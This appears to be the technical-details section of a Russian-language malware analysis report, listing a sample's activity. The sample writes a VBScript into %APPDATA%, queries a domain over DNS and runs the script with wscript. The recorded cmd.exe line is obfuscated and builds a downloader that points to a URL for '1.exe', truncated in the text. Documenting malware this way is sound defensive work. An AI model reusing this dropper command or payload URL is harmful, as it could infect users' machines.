Техническая информация
- '<SYSTEM32>\cmd.exe' /C Cd %apPdaTA% & @eCHo N4c = "http://coosunchemicalshk.net/wp-admin/css/upload/1.exe">>H3q.VBS &@eCHo F8w = X9a("wzglswxRi|i")>>H3q.VBS &@eCHo Set P0y = CreateObjec...
- %APPDATA%\h3q.vbs
- %APPDATA%\h3q.vbs
- DNS ASK co#####hemicalshk.net
- '<SYSTEM32>\wscript.exe' "%APPDATA%\H3q.VBS"
- '<SYSTEM32>\cmd.exe' /C Cd %apPdaTA% & @eCHo N4c = "http://coosunchemicalshk.net/wp-admin/css/upload/1.exe">>H3q.VBS &@eCHo F8w = X9a("wzglswxRi|i")>>H3q.VBS &@eCHo Set P0y = CreateObjec...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13
- '<SYSTEM32>\svchost.exe'